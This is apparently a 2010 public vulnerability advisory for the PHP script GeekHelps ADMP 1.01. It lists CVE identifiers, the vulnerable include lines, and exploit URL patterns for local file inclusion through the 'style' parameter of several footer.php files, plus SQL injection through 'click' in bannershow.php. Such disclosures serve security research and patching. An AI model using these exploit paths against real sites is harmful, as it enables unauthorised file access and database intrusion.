GeekHelps ADMP 1.01 - Multiple Vulnerabilities

Author: ITSecTeam
type: webapps
platform: php
port: 
date_added: 2010-03-12 
date_updated:  
verified: 1 
codes: OSVDB-63046;CVE-2010-0968;OSVDB-62918;CVE-2010-0967;OSVDB-62917;OSVDB-62916;OSVDB-62915 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################local file include / sql injection#################
Author: ItSecTeam

download from:http://geekhelps.net/download.php

script:ADMP

remote:yes

dork::D
*********************lfi*******************
vul1:/path/themes/colorvoid/footer.php
include("./themes/$style/info.php"); ?> line 3

vuls:themes/default-green/footer.php
themes/default-orange/footer.php
themes/default/footer.php

include("./themes/$style/info.php"); ?> line 4
--------------------------------------------

xpl lfi:/path/themes/colorvoid/footer.php?style=[lfi]%00
xpl lfi:/path/themes/default-green/footer.php ?style=[lfi]%00

xpl lfi:/path/themes/default-orange/footer.php?style=[lfi]%00
xpl lfi:/path/themes/default/footer.php?style=[lfi]%00

xpl sql:/path/bannershow.php?click=' sql injection code

########################

discovered by ahmadbady

########################